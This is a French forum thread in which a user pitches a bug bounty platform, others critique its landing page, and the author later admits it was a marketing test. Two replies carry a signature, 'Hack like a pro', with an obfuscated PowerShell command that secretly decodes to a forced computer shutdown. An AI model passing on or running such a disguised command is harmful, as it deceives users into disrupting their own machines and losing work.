Annonce

Réduire
Aucune annonce.

[Projet] Gagner de l'argent avec les bug bounties

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Projet] Gagner de l'argent avec les bug bounties

    Bonjour à tous,

    Avec des potes dev, on est entrain de développer une plateforme pour hackers pour gagner des thunes. En gros on souhaite concurrencer les plateformes américaines existantes (hackerone etc...) et apporter des améliorations.
    Le principe est simple pour l'instant, notre commercial démarche des entreprises, on vous propose des missions, si vous trouvez des bugs sur leurs sites, vous gagnez de l'argent

    Pour s’inscrire il suffit de rentrer son adresse e-mail sur cette landing page toute simple -> http://hectorsquad.strikingly.com/

    Merci beaucoup !
    Dernière modification par Anonyme77, 05 décembre 2017, 07h05. Motif: Modification du titre dans un esprit white hat

  • #2
    Ton projet semble intéressant.
    Je ne suis pas certain qu'il reste beaucoup de place dans le milieu mais pourquoi pas essayer ?

    Quelles sont par contre les modifications que vous compter apporter ?
    Tu dis que vous voulez le faire sans dire lesquelles.
    Dernière modification par Anonyme77, 05 décembre 2017, 07h05.

    Commentaire


    • #3
      Salut,

      Mes questions et remarques :

      Le site ne semble pas terminé, normal ?
      - Est-ce que vous prévoyez d'avoir votre ndd ? Parce que là ça fait pas super "pro", et si vous comptez attirer des entreprises... pas le choix.
      - Idem certif TLS
      - Libellé des menus qui déconne
      - Boutons qui déconnent
      - Ergonomie : plusieurs liens qui pointent sur la même chose (rejoindre le programme Hector)

      Sinon, comme le souligne Anonyme, c'est quoi vos forces ?
      Genre par rapport à https://bountyfactory.io/ qui est une plateforme FR ?

      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        (Une semaine plus tard : ) C'est donc un projet mort-né ?
        Parce que m'est avis que l’animation des communautés de tes futures clients et partenaires aurait du figurer en haut de ta liste de priorités
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          (Un mois apres.. ) Oui desole ce projet est mort-ne :P Il s'agissait en fait d'un test pour un projet de Growth Hacking en cours (marketing etc...). Mais l'entrepreneuriat et le hacking sont mes grandes passions, j'espere un jour pouvoir combiner les deux

          Commentaire


          • #6
            Projet intéressant j'éspère que tu atteindra ton objectif même si je pense comme Anonyme77 mais ce n'est pas pour autant qu'il faut se décourager !

            Commentaire


            • #7
              Bonjour,

              Où es-tu rendu dans ton projet au final ?

              Commentaire

              Chargement...
              X